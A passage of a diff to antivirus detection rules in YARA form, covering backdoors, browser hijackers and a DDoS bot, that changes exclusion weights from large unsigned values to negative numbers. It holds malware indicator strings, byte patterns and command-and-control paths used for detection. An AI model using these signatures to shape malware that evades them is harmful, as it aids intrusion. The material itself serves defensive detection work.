((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*1+(#a_80_9 & 1)*1+(#a_80_10 & 1)*1+(#a_80_11 & 1)*1+(#a_80_12 & 1)*1+(#a_80_13 & 1)*1+(#a_80_14 & 1)*1+(#a_80_15 & 1)*1+(#a_80_16 & 1)*1+(#a_80_17 & 1)*1+(#a_80_18 & 1)*1+(#a_80_19 & 1)*1+(#a_80_20 & 1)*1+(#a_80_21 & 1)*1+(#a_80_22 & 1)*1+(#a_80_23 & 1)*1+(#a_80_24 & 1)*1+(#a_80_25 & 1)*1+(#a_80_26 & 1)*1+(#a_80_27 & 1)*1+(#a_80_28 & 1)*1+(#a_80_29 & 1)*1+(#a_80_30 & 1)*1+(#a_80_31 & 1)*1+(#a_80_32 & 1)*1+(#a_80_33 & 1)*1+(#a_80_34 & 1)*1+(#a_80_35 & 1)*1+(#a_80_36 & 1)*1+(#a_80_37 & 1)*1+(#a_80_38 & 1)*1+(#a_80_39 & 1)*1+(#a_80_40 & 1)*1+(#a_80_41 & 1)*1+(#a_80_42 & 1)*1+(#a_80_43 & 1)*1+(#a_80_44 & 1)*1+(#a_80_45 & 1)*1+(#a_80_46 & 1)*-10+(#a_80_47 & 1)*-10) >=5
|
||||
|
||||
}
|
||||
|
|
@ -10,8 +10,8 @@ rule Backdoor_Win32_Vatet_SLA_dha{
|
|||
$a_00_3 = {63 00 3a 00 5c 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 6d 00 65 00 64 00 69 00 61 00 5c 00 } //1 c:\windows\media\
|
||||
$a_00_4 = {67 00 6f 00 6f 00 67 00 6c 00 65 00 75 00 70 00 64 00 61 00 74 00 65 00 2e 00 65 00 78 00 65 00 } //1 googleupdate.exe
|
||||
$a_00_5 = {67 00 6f 00 6f 00 70 00 64 00 61 00 74 00 65 00 2e 00 64 00 6c 00 6c 00 2e 00 64 00 61 00 74 00 } //5 goopdate.dll.dat
|
||||
$a_00_6 = {6f 00 73 00 71 00 75 00 65 00 72 00 79 00 69 00 2e 00 65 00 78 00 65 00 } //65436 osqueryi.exe
|
||||
$a_00_6 = {6f 00 73 00 71 00 75 00 65 00 72 00 79 00 69 00 2e 00 65 00 78 00 65 00 } //-100 osqueryi.exe
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*5+(#a_00_6 & 1)*65436) >=7
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*5+(#a_00_6 & 1)*-100) >=7
|
||||
|
||||
}
|
||||
|
|
@ -4,8 +4,8 @@ rule Backdoor_Win32_Venik_E_dha{
|
|||
description = "Backdoor:Win32/Venik.E!dha,SIGNATURE_TYPE_PEHSTR_EXT,03 00 03 00 08 00 00 "
|
||||
|
||||
strings :
|
||||
$a_01_0 = {63 61 63 6c 73 2e 65 78 65 20 63 3a 5c } //65535 cacls.exe c:\
|
||||
$a_01_1 = {2f 73 65 61 72 63 68 3f 68 6c 3d 65 6e 26 71 } //65534 /search?hl=en&q
|
||||
$a_01_0 = {63 61 63 6c 73 2e 65 78 65 20 63 3a 5c } //-1 cacls.exe c:\
|
||||
$a_01_1 = {2f 73 65 61 72 63 68 3f 68 6c 3d 65 6e 26 71 } //-2 /search?hl=en&q
|
||||
$a_00_2 = {5c 53 79 73 74 65 6d 33 32 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b } //1 \System32\svchost.exe -k
|
||||
$a_01_3 = {00 49 6e 73 74 61 6c 6c 00 52 75 6e } //1 䤀獮慴汬刀湵
|
||||
$a_03_4 = {2e 50 41 58 00 00 00 00 90 01 08 2e 50 41 44 00 90 00 } //1
|
||||
|
|
@ -13,6 +13,6 @@ rule Backdoor_Win32_Venik_E_dha{
|
|||
$a_03_6 = {3d 02 00 00 32 0f 87 90 01 04 0f 84 90 01 04 3d 03 00 00 31 90 00 } //1
|
||||
$a_01_7 = {8b 44 24 08 8a 08 32 ca 02 ca 88 08 40 4e 75 f4 } //1
|
||||
condition:
|
||||
((#a_01_0 & 1)*65535+(#a_01_1 & 1)*65534+(#a_00_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*1+(#a_03_6 & 1)*1+(#a_01_7 & 1)*1) >=3
|
||||
((#a_01_0 & 1)*-1+(#a_01_1 & 1)*-2+(#a_00_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*1+(#a_03_6 & 1)*1+(#a_01_7 & 1)*1) >=3
|
||||
|
||||
}
|
||||
|
|
@ -5,8 +5,8 @@ rule Backdoor_Win64_SignJoinInstaller_A{
|
|||
|
||||
strings :
|
||||
$a_03_0 = {c1 e1 03 48 8b 90 02 06 48 d3 ea 48 8b ca 0f b6 c9 33 c1 90 00 } //1
|
||||
$a_01_1 = {4f 44 53 65 63 75 72 69 74 79 2e 64 6c 6c 00 44 6c 6c 43 61 6e 55 6e 6c 6f 61 64 4e 6f 77 00 6d 73 78 6d 6c 33 2e 64 6c 6c } //65535
|
||||
$a_01_1 = {4f 44 53 65 63 75 72 69 74 79 2e 64 6c 6c 00 44 6c 6c 43 61 6e 55 6e 6c 6f 61 64 4e 6f 77 00 6d 73 78 6d 6c 33 2e 64 6c 6c } //-1
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*65535) >=1
|
||||
((#a_03_0 & 1)*1+(#a_01_1 & 1)*-1) >=1
|
||||
|
||||
}
|
||||
|
|
@ -25,10 +25,10 @@ rule Backdoor_WinNT_PcClient{
|
|||
$a_01_18 = {4b 65 53 65 72 76 69 63 65 44 65 73 63 72 69 70 74 6f 72 54 61 62 6c 65 } //1 KeServiceDescriptorTable
|
||||
$a_01_19 = {50 73 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 } //1 PsGetCurrentProcessId
|
||||
$a_01_20 = {5a 77 51 75 65 72 79 44 69 72 65 63 74 6f 72 79 46 69 6c 65 } //1 ZwQueryDirectoryFile
|
||||
$a_01_21 = {6b 64 65 66 65 6e 73 65 } //65486 kdefense
|
||||
$a_00_22 = {5c 70 72 75 65 62 61 5c 6d 69 70 72 75 65 62 61 5c 42 69 6e 5c } //65486 \prueba\miprueba\Bin\
|
||||
$a_00_23 = {41 00 63 00 74 00 69 00 76 00 65 00 58 00 20 00 50 00 6f 00 72 00 74 00 65 00 63 00 74 00 6f 00 72 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 } //65486 ActiveX Portector Driver
|
||||
$a_01_21 = {6b 64 65 66 65 6e 73 65 } //-50 kdefense
|
||||
$a_00_22 = {5c 70 72 75 65 62 61 5c 6d 69 70 72 75 65 62 61 5c 42 69 6e 5c } //-50 \prueba\miprueba\Bin\
|
||||
$a_00_23 = {41 00 63 00 74 00 69 00 76 00 65 00 58 00 20 00 50 00 6f 00 72 00 74 00 65 00 63 00 74 00 6f 00 72 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 } //-50 ActiveX Portector Driver
|
||||
condition:
|
||||
((#a_00_0 & 1)*3+(#a_02_1 & 1)*3+(#a_02_2 & 1)*2+(#a_02_3 & 1)*4+(#a_02_4 & 1)*5+(#a_02_5 & 1)*5+(#a_02_6 & 1)*5+(#a_02_7 & 1)*4+(#a_00_8 & 1)*2+(#a_00_9 & 1)*2+(#a_00_10 & 1)*2+(#a_00_11 & 1)*3+(#a_00_12 & 1)*3+(#a_00_13 & 1)*3+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_03_17 & 1)*3+(#a_01_18 & 1)*1+(#a_01_19 & 1)*1+(#a_01_20 & 1)*1+(#a_01_21 & 1)*65486+(#a_00_22 & 1)*65486+(#a_00_23 & 1)*65486) >=12
|
||||
((#a_00_0 & 1)*3+(#a_02_1 & 1)*3+(#a_02_2 & 1)*2+(#a_02_3 & 1)*4+(#a_02_4 & 1)*5+(#a_02_5 & 1)*5+(#a_02_6 & 1)*5+(#a_02_7 & 1)*4+(#a_00_8 & 1)*2+(#a_00_9 & 1)*2+(#a_00_10 & 1)*2+(#a_00_11 & 1)*3+(#a_00_12 & 1)*3+(#a_00_13 & 1)*3+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_03_17 & 1)*3+(#a_01_18 & 1)*1+(#a_01_19 & 1)*1+(#a_01_20 & 1)*1+(#a_01_21 & 1)*-50+(#a_00_22 & 1)*-50+(#a_00_23 & 1)*-50) >=12
|
||||
|
||||
}
|
||||
|
|
@ -78,9 +78,9 @@ rule BrowserModifier_MSIL_MediaArena_MTB_5{
|
|||
$a_80_5 = {49 44 53 5f 45 44 47 45 5f 53 45 54 54 49 4e 47 53 5f 44 45 46 5f 42 52 4f 57 53 45 52 } //IDS_EDGE_SETTINGS_DEF_BROWSER 1
|
||||
$a_80_6 = {42 72 6f 77 73 65 72 4c 6f 61 64 65 64 57 69 74 68 55 72 6c } //BrowserLoadedWithUrl 1
|
||||
$a_80_7 = {43 4f 4c 4c 45 43 54 5f 44 41 54 41 5f 53 45 41 52 43 48 5f 45 4e 47 49 4e 45 } //COLLECT_DATA_SEARCH_ENGINE 1
|
||||
$a_80_8 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
|
||||
$a_80_9 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
|
||||
$a_80_8 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
|
||||
$a_80_9 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*65436+(#a_80_9 & 1)*65436) >=8
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*-100+(#a_80_9 & 1)*-100) >=8
|
||||
|
||||
}
|
||||
|
|
@ -67,9 +67,9 @@ rule BrowserModifier_Win32_ClearSearch_5{
|
|||
$a_00_4 = {49 45 5f 43 6c 72 53 63 68 2e 44 4c 4c } //3 IE_ClrSch.DLL
|
||||
$a_00_5 = {43 6c 72 53 63 68 4c 6f 61 64 65 72 } //3 ClrSchLoader
|
||||
$a_01_6 = {63 6c 72 73 63 68 2e 63 6f 6d 2f 6c 6f 61 64 65 72 } //3 clrsch.com/loader
|
||||
$a_01_7 = {52 65 64 69 72 65 63 74 73 20 74 6f 20 63 65 72 74 61 69 6e 20 73 69 74 65 73 20 62 61 73 65 64 20 6f 6e 20 77 68 65 72 65 20 79 6f 75 20 62 72 6f 77 73 65 } //65531 Redirects to certain sites based on where you browse
|
||||
$a_01_7 = {52 65 64 69 72 65 63 74 73 20 74 6f 20 63 65 72 74 61 69 6e 20 73 69 74 65 73 20 62 61 73 65 64 20 6f 6e 20 77 68 65 72 65 20 79 6f 75 20 62 72 6f 77 73 65 } //-5 Redirects to certain sites based on where you browse
|
||||
condition:
|
||||
((#a_00_0 & 1)*2+(#a_01_1 & 1)*3+(#a_01_2 & 1)*2+(#a_00_3 & 1)*3+(#a_00_4 & 1)*3+(#a_00_5 & 1)*3+(#a_01_6 & 1)*3+(#a_01_7 & 1)*65531) >=15
|
||||
((#a_00_0 & 1)*2+(#a_01_1 & 1)*3+(#a_01_2 & 1)*2+(#a_00_3 & 1)*3+(#a_00_4 & 1)*3+(#a_00_5 & 1)*3+(#a_01_6 & 1)*3+(#a_01_7 & 1)*-5) >=15
|
||||
|
||||
}
|
||||
rule BrowserModifier_Win32_ClearSearch_6{
|
||||
|
|
|
|||
|
|
@ -56,9 +56,9 @@ rule BrowserModifier_Win32_Diplugem_5{
|
|||
strings :
|
||||
$a_11_0 = {74 6d 6c 5f 6c 6f 61 64 65 72 2e 65 78 65 01 } //1
|
||||
$a_8b_1 = {33 4f 04 81 e1 ff ff ff 7f 33 0f 8d 7f 04 8b c1 24 01 0f } //12544
|
||||
$a_d8_2 = {c0 25 90 01 04 33 87 90 01 04 d1 e9 33 c1 89 87 90 01 04 4b 75 90 00 01 00 38 13 b9 04 01 00 00 29 c1 8d 84 45 d4 fb ff ff 89 4c 24 04 89 04 24 c7 44 24 0c 04 00 00 00 c7 44 24 08 90 01 04 e8 90 01 04 89 34 24 ff 15 90 01 04 83 ec 04 89 45 f0 90 00 00 00 02 00 78 c4 00 00 03 00 03 00 04 00 00 01 00 23 03 0f b6 49 01 29 c8 25 ff 00 00 00 88 c2 8b 45 90 01 01 89 c1 81 c1 01 00 00 00 89 4d 90 01 01 88 10 90 00 01 00 23 03 0f b6 52 01 29 d0 25 ff 00 00 00 88 c1 8b 45 90 01 01 89 c2 81 c2 01 00 00 00 89 55 90 01 01 88 08 90 00 01 00 4e 03 89 e2 8d 75 90 01 01 89 72 0c 89 0a c7 42 08 40 00 00 00 c7 42 04 00 10 00 00 8b 0d 90 01 04 89 45 90 01 01 ff d1 83 ec 10 8b 0d 90 01 04 ba 00 10 00 00 8b 75 90 01 01 8b 7d 90 01 01 89 34 24 89 7c 24 } //49334
|
||||
$a_d8_2 = {c0 25 90 01 04 33 87 90 01 04 d1 e9 33 c1 89 87 90 01 04 4b 75 90 00 01 00 38 13 b9 04 01 00 00 29 c1 8d 84 45 d4 fb ff ff 89 4c 24 04 89 04 24 c7 44 24 0c 04 00 00 00 c7 44 24 08 90 01 04 e8 90 01 04 89 34 24 ff 15 90 01 04 83 ec 04 89 45 f0 90 00 00 00 02 00 78 c4 00 00 03 00 03 00 04 00 00 01 00 23 03 0f b6 49 01 29 c8 25 ff 00 00 00 88 c2 8b 45 90 01 01 89 c1 81 c1 01 00 00 00 89 4d 90 01 01 88 10 90 00 01 00 23 03 0f b6 52 01 29 d0 25 ff 00 00 00 88 c1 8b 45 90 01 01 89 c2 81 c2 01 00 00 00 89 55 90 01 01 88 08 90 00 01 00 4e 03 89 e2 8d 75 90 01 01 89 72 0c 89 0a c7 42 08 40 00 00 00 c7 42 04 00 10 00 00 8b 0d 90 01 04 89 45 90 01 01 ff d1 83 ec 10 8b 0d 90 01 04 ba 00 10 00 00 8b 75 90 01 01 8b 7d 90 01 01 89 34 24 89 7c 24 } //-16202
|
||||
condition:
|
||||
((#a_11_0 & 1)*1+(#a_8b_1 & 1)*12544+(#a_d8_2 & 1)*49334) >=3
|
||||
((#a_11_0 & 1)*1+(#a_8b_1 & 1)*12544+(#a_d8_2 & 1)*-16202) >=3
|
||||
|
||||
}
|
||||
rule BrowserModifier_Win32_Diplugem_6{
|
||||
|
|
@ -210,9 +210,9 @@ rule BrowserModifier_Win32_Diplugem_17{
|
|||
strings :
|
||||
$a_13_0 = {4c 24 34 89 4c 24 20 89 5c 24 24 8b 4c 24 38 ff d1 8b 84 24 b0 00 00 00 8b 8c 24 b4 00 00 00 03 41 09 89 84 24 a8 00 00 00 ff 94 24 a8 00 00 00 c7 44 24 7c 90 01 04 e9 0d 00 00 00 b8 00 00 00 00 8d 65 f4 5e 5f 5b 5d c3 90 00 0a } //10
|
||||
$a_c7_1 = {24 b4 00 00 00 00 00 00 00 c7 84 24 b0 00 00 00 00 00 00 } //28160
|
||||
$a_24_2 = {00 00 00 00 00 00 00 c7 84 24 a8 00 00 00 00 00 00 00 c7 84 24 a4 00 00 00 00 00 00 00 e8 90 01 04 8d 0d 04 90 01 02 00 89 84 24 ac 00 00 00 a1 90 01 03 00 8b 15 00 90 01 02 00 8b b4 24 ac 00 00 00 89 34 24 89 54 24 04 89 4c 24 08 89 44 24 0c e8 90 00 01 00 5d 13 89 0c 24 c7 44 24 04 01 00 00 00 89 84 24 90 01 02 00 00 e8 90 01 04 89 84 24 90 01 02 00 00 8b 84 24 90 01 02 00 00 89 84 24 90 01 } //50944
|
||||
$a_24_2 = {00 00 00 00 00 00 00 c7 84 24 a8 00 00 00 00 00 00 00 c7 84 24 a4 00 00 00 00 00 00 00 e8 90 01 04 8d 0d 04 90 01 02 00 89 84 24 ac 00 00 00 a1 90 01 03 00 8b 15 00 90 01 02 00 8b b4 24 ac 00 00 00 89 34 24 89 54 24 04 89 4c 24 08 89 44 24 0c e8 90 00 01 00 5d 13 89 0c 24 c7 44 24 04 01 00 00 00 89 84 24 90 01 02 00 00 e8 90 01 04 89 84 24 90 01 02 00 00 8b 84 24 90 01 02 00 00 89 84 24 90 01 } //-14592
|
||||
condition:
|
||||
((#a_13_0 & 1)*10+(#a_c7_1 & 1)*28160+(#a_24_2 & 1)*50944) >=21
|
||||
((#a_13_0 & 1)*10+(#a_c7_1 & 1)*28160+(#a_24_2 & 1)*-14592) >=21
|
||||
|
||||
}
|
||||
rule BrowserModifier_Win32_Diplugem_18{
|
||||
|
|
|
|||
|
|
@ -65,10 +65,10 @@ rule BrowserModifier_Win32_Istbar_F_2{
|
|||
$a_01_45 = {63 3a 5c 76 6d 63 68 65 63 6b 2e 64 6c 6c } //2 c:\vmcheck.dll
|
||||
$a_01_46 = {2f 69 73 74 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 5f 6c 6f 67 2e 70 68 70 } //5 /istdownload_url_log.php
|
||||
$a_01_47 = {2f 69 73 74 5f 64 65 62 75 67 5f 6e 65 77 } //5 /ist_debug_new
|
||||
$a_00_48 = {41 56 52 45 50 2e 64 6c 6c } //65526 AVREP.dll
|
||||
$a_00_49 = {50 00 65 00 73 00 74 00 50 00 61 00 74 00 72 00 6f 00 6c 00 } //65526 PestPatrol
|
||||
$a_00_50 = {45 63 68 6f 20 42 69 65 6e 76 65 6e 75 65 20 73 75 72 20 54 6f 6f 6c 62 61 72 53 68 6f 6f 74 65 72 } //65236 Echo Bienvenue sur ToolbarShooter
|
||||
$a_00_48 = {41 56 52 45 50 2e 64 6c 6c } //-10 AVREP.dll
|
||||
$a_00_49 = {50 00 65 00 73 00 74 00 50 00 61 00 74 00 72 00 6f 00 6c 00 } //-10 PestPatrol
|
||||
$a_00_50 = {45 63 68 6f 20 42 69 65 6e 76 65 6e 75 65 20 73 75 72 20 54 6f 6f 6c 62 61 72 53 68 6f 6f 74 65 72 } //-300 Echo Bienvenue sur ToolbarShooter
|
||||
condition:
|
||||
((#a_01_0 & 1)*5+(#a_00_1 & 1)*3+(#a_01_2 & 1)*5+(#a_01_3 & 1)*5+(#a_00_4 & 1)*5+(#a_01_5 & 1)*3+(#a_01_6 & 1)*5+(#a_00_7 & 1)*3+(#a_01_8 & 1)*3+(#a_01_9 & 1)*3+(#a_01_10 & 1)*3+(#a_01_11 & 1)*2+(#a_01_12 & 1)*2+(#a_01_13 & 1)*2+(#a_01_14 & 1)*2+(#a_01_15 & 1)*2+(#a_01_16 & 1)*2+(#a_01_17 & 1)*3+(#a_01_18 & 1)*8+(#a_01_19 & 1)*8+(#a_01_20 & 1)*5+(#a_01_21 & 1)*5+(#a_01_22 & 1)*5+(#a_01_23 & 1)*5+(#a_01_24 & 1)*1+(#a_01_25 & 1)*1+(#a_01_26 & 1)*1+(#a_01_27 & 1)*1+(#a_01_28 & 1)*1+(#a_01_29 & 1)*1+(#a_01_30 & 1)*1+(#a_01_31 & 1)*1+(#a_01_32 & 1)*1+(#a_01_33 & 1)*1+(#a_01_34 & 1)*1+(#a_01_35 & 1)*1+(#a_01_36 & 1)*1+(#a_01_37 & 1)*1+(#a_01_38 & 1)*1+(#a_01_39 & 1)*1+(#a_01_40 & 1)*1+(#a_01_41 & 1)*5+(#a_01_42 & 1)*3+(#a_01_43 & 1)*3+(#a_01_44 & 1)*3+(#a_01_45 & 1)*2+(#a_01_46 & 1)*5+(#a_01_47 & 1)*5+(#a_00_48 & 1)*65526+(#a_00_49 & 1)*65526+(#a_00_50 & 1)*65236) >=20
|
||||
((#a_01_0 & 1)*5+(#a_00_1 & 1)*3+(#a_01_2 & 1)*5+(#a_01_3 & 1)*5+(#a_00_4 & 1)*5+(#a_01_5 & 1)*3+(#a_01_6 & 1)*5+(#a_00_7 & 1)*3+(#a_01_8 & 1)*3+(#a_01_9 & 1)*3+(#a_01_10 & 1)*3+(#a_01_11 & 1)*2+(#a_01_12 & 1)*2+(#a_01_13 & 1)*2+(#a_01_14 & 1)*2+(#a_01_15 & 1)*2+(#a_01_16 & 1)*2+(#a_01_17 & 1)*3+(#a_01_18 & 1)*8+(#a_01_19 & 1)*8+(#a_01_20 & 1)*5+(#a_01_21 & 1)*5+(#a_01_22 & 1)*5+(#a_01_23 & 1)*5+(#a_01_24 & 1)*1+(#a_01_25 & 1)*1+(#a_01_26 & 1)*1+(#a_01_27 & 1)*1+(#a_01_28 & 1)*1+(#a_01_29 & 1)*1+(#a_01_30 & 1)*1+(#a_01_31 & 1)*1+(#a_01_32 & 1)*1+(#a_01_33 & 1)*1+(#a_01_34 & 1)*1+(#a_01_35 & 1)*1+(#a_01_36 & 1)*1+(#a_01_37 & 1)*1+(#a_01_38 & 1)*1+(#a_01_39 & 1)*1+(#a_01_40 & 1)*1+(#a_01_41 & 1)*5+(#a_01_42 & 1)*3+(#a_01_43 & 1)*3+(#a_01_44 & 1)*3+(#a_01_45 & 1)*2+(#a_01_46 & 1)*5+(#a_01_47 & 1)*5+(#a_00_48 & 1)*-10+(#a_00_49 & 1)*-10+(#a_00_50 & 1)*-300) >=20
|
||||
|
||||
}
|
||||
|
|
@ -9,9 +9,9 @@ rule BrowserModifier_Win32_KipodToolsCby{
|
|||
$a_01_2 = {4b 69 70 6f 64 54 6f 6f 6c 73 5c 4b 69 70 6f 64 54 6f 6f 6c 73 2e 63 70 70 } //1 KipodTools\KipodTools.cpp
|
||||
$a_01_3 = {4f 6e 6c 79 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 63 6f 64 65 20 73 68 6f 75 6c 64 20 77 72 69 74 65 20 74 68 69 73 } //5 Only Internet Explorer code should write this
|
||||
$a_01_4 = {53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 49 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 20 00 45 00 78 00 70 00 6c 00 6f 00 72 00 65 00 72 00 5c 00 41 00 70 00 70 00 72 00 6f 00 76 00 65 00 64 00 20 00 45 00 78 00 74 00 65 00 6e 00 73 00 69 00 6f 00 6e 00 73 00 } //5 Software\Microsoft\Internet Explorer\Approved Extensions
|
||||
$a_01_5 = {56 69 62 65 72 } //65526 Viber
|
||||
$a_01_6 = {56 00 69 00 62 00 65 00 72 00 } //65526 Viber
|
||||
$a_01_5 = {56 69 62 65 72 } //-10 Viber
|
||||
$a_01_6 = {56 00 69 00 62 00 65 00 72 00 } //-10 Viber
|
||||
condition:
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*5+(#a_01_4 & 1)*5+(#a_01_5 & 1)*65526+(#a_01_6 & 1)*65526) >=11
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*5+(#a_01_4 & 1)*5+(#a_01_5 & 1)*-10+(#a_01_6 & 1)*-10) >=11
|
||||
|
||||
}
|
||||
|
|
@ -31,9 +31,9 @@ rule BrowserModifier_Win32_Xupiter{
|
|||
$a_02_24 = {70 6f 70 75 6e 64 65 72 2e 68 74 6d 6c 90 02 20 70 6f 70 75 6e 64 65 72 2e 63 66 67 90 02 20 53 4f 46 54 57 41 52 45 5c 58 75 70 69 74 65 72 90 02 20 49 6e 73 74 61 6c 6c 61 74 69 6f 6e 20 46 6f 6c 64 65 72 90 02 20 50 6f 70 75 6e 64 65 72 90 02 20 43 50 6f 70 75 6e 64 65 72 44 6f 63 90 02 20 43 50 6f 70 75 6e 64 65 72 56 69 65 77 90 00 } //104
|
||||
$a_02_25 = {4f 4c 44 5f 53 45 41 52 43 48 5f 48 4f 4f 4b 53 5f 4c 4f 43 41 4c 90 02 10 53 6f 66 74 77 61 72 65 5c 58 75 70 69 74 65 72 90 02 10 4f 4c 44 5f 53 45 41 52 43 48 5f 48 4f 4f 4b 53 5f 43 55 52 52 45 4e 54 90 00 } //104
|
||||
$a_02_26 = {68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 77 69 72 65 2e 63 6f 6d 90 02 20 49 6e 74 65 72 6e 65 74 20 43 6f 6e 6e 65 63 74 69 6f 6e 20 54 65 73 74 90 02 20 53 71 77 69 72 65 90 02 20 44 6f 77 6e 6c 6f 61 64 3a 90 02 20 66 69 6c 65 2e 70 68 70 3f 66 69 6c 65 3d 90 02 20 26 61 69 64 3d 90 02 20 66 69 6c 65 69 6e 66 6f 2e 70 68 70 3f 66 69 6c 65 3d 90 02 20 26 73 69 64 3d 90 02 20 53 6f 66 74 77 61 72 65 5c 53 51 90 00 } //104
|
||||
$a_00_27 = {41 64 76 61 6e 63 65 64 20 55 6e 69 6e 73 74 61 6c 6c 65 72 20 50 52 4f } //65236 Advanced Uninstaller PRO
|
||||
$a_00_28 = {45 61 73 79 53 79 6e 63 20 50 72 6f } //65236 EasySync Pro
|
||||
$a_00_27 = {41 64 76 61 6e 63 65 64 20 55 6e 69 6e 73 74 61 6c 6c 65 72 20 50 52 4f } //-300 Advanced Uninstaller PRO
|
||||
$a_00_28 = {45 61 73 79 53 79 6e 63 20 50 72 6f } //-300 EasySync Pro
|
||||
condition:
|
||||
((#a_00_0 & 1)*100+(#a_00_1 & 1)*100+(#a_00_2 & 1)*100+(#a_00_3 & 1)*2+(#a_00_4 & 1)*2+(#a_00_5 & 1)*2+(#a_00_6 & 1)*2+(#a_00_7 & 1)*2+(#a_00_8 & 1)*2+(#a_00_9 & 1)*2+(#a_00_10 & 1)*2+(#a_00_11 & 1)*2+(#a_00_12 & 1)*2+(#a_00_13 & 1)*2+(#a_00_14 & 1)*2+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*2+(#a_00_18 & 1)*2+(#a_00_19 & 1)*2+(#a_00_20 & 1)*2+(#a_00_21 & 1)*2+(#a_00_22 & 1)*2+(#a_00_23 & 1)*2+(#a_02_24 & 1)*104+(#a_02_25 & 1)*104+(#a_02_26 & 1)*104+(#a_00_27 & 1)*65236+(#a_00_28 & 1)*65236) >=104
|
||||
((#a_00_0 & 1)*100+(#a_00_1 & 1)*100+(#a_00_2 & 1)*100+(#a_00_3 & 1)*2+(#a_00_4 & 1)*2+(#a_00_5 & 1)*2+(#a_00_6 & 1)*2+(#a_00_7 & 1)*2+(#a_00_8 & 1)*2+(#a_00_9 & 1)*2+(#a_00_10 & 1)*2+(#a_00_11 & 1)*2+(#a_00_12 & 1)*2+(#a_00_13 & 1)*2+(#a_00_14 & 1)*2+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*2+(#a_00_18 & 1)*2+(#a_00_19 & 1)*2+(#a_00_20 & 1)*2+(#a_00_21 & 1)*2+(#a_00_22 & 1)*2+(#a_00_23 & 1)*2+(#a_02_24 & 1)*104+(#a_02_25 & 1)*104+(#a_02_26 & 1)*104+(#a_00_27 & 1)*-300+(#a_00_28 & 1)*-300) >=104
|
||||
|
||||
}
|
||||
|
|
@ -8,9 +8,9 @@ rule DDoS_Win32_Abot_A{
|
|||
$a_01_1 = {2f 67 61 74 65 2e 70 68 70 3f 68 77 69 64 3d } //1 /gate.php?hwid=
|
||||
$a_01_2 = {26 6c 6f 63 61 6c 69 70 3d } //1 &localip=
|
||||
$a_01_3 = {26 77 69 6e 76 65 72 3d } //1 &winver=
|
||||
$a_00_4 = {4d 00 61 00 67 00 6e 00 65 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2e 00 41 00 72 00 74 00 69 00 66 00 61 00 63 00 74 00 73 00 2e 00 64 00 6c 00 6c 00 } //65436 Magnet.Content.Artifacts.dll
|
||||
$a_00_5 = {53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 43 6f 6d 70 61 72 65 72 3c 4d 69 63 72 6f 73 6f 66 74 2e 53 6f 75 6e 64 65 72 2e 50 72 6f 74 6f 63 6f 6c 73 2e 46 72 61 6d 65 3e } //65436 System.Collections.Generic.IComparer<Microsoft.Sounder.Protocols.Frame>
|
||||
$a_00_4 = {4d 00 61 00 67 00 6e 00 65 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2e 00 41 00 72 00 74 00 69 00 66 00 61 00 63 00 74 00 73 00 2e 00 64 00 6c 00 6c 00 } //-100 Magnet.Content.Artifacts.dll
|
||||
